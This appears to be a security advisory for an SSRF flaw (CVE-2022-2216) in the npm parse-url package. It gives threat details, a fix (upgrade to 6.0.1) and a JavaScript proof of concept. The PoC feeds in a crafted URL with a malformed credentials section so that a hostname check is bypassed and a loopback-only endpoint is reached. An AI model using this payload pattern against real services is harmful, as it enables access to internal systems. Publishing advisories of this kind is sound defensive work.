Server-side Request Forgery (SSRF) Affecting parse-url package, versions <6.0.1
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.19% (58th percentile)
- Snyk ID SNYK-JS-PARSEURL-2936249
- published 28 Jun 2022
- disclosed 28 Jun 2022
- credit Pocas
Introduced: 28 Jun 2022
CVE-2022-2216
How to fix?
Upgrade parse-url to version 6.0.1 or higher.
Overview
parse-url is an advanced URL parser that also supports git URLs.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) in the parseUrl function, due to mishandling of hostnames when processing usernames and passwords.
PoC:
  const parseUrl = require("parse-url");
  const express = require('express');
  const http = require('http');
  const app = express();

  // Middleware that only lets requests arriving from the loopback interface through.
  const isLocal = () => (req, res, next) =>
    (req.connection.remoteAddress === '::ffff:127.0.0.1' || req.connection.remoteAddress === '::1')
      ? next()
      : res.json({ state: "You're not locally" });

  // Crafted input: because of the credential-handling bug, parsed.resource is not
  // '127.0.0.1' for this URL, so the check below is bypassed while the request
  // still reaches 127.0.0.1:9999.
  const parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
  console.log(parsed);

  app.get('/', (req, res) => {
    if (parsed.resource == '127.0.0.1') {
      res.send('Not good');
    } else {
      // The parsed hostname passed the check, so the server fetches the URL itself.
      http.get(parsed.href).on('error', (err) => console.error(err.message));
      res.send('Good');
    }
  });

  app.get('/ssrf_check', isLocal(), (req, res) => {
    console.log('ssrf bypass');
    res.send(true);
  });

  app.listen(9999);
References
CVSS Scores (version 3.1)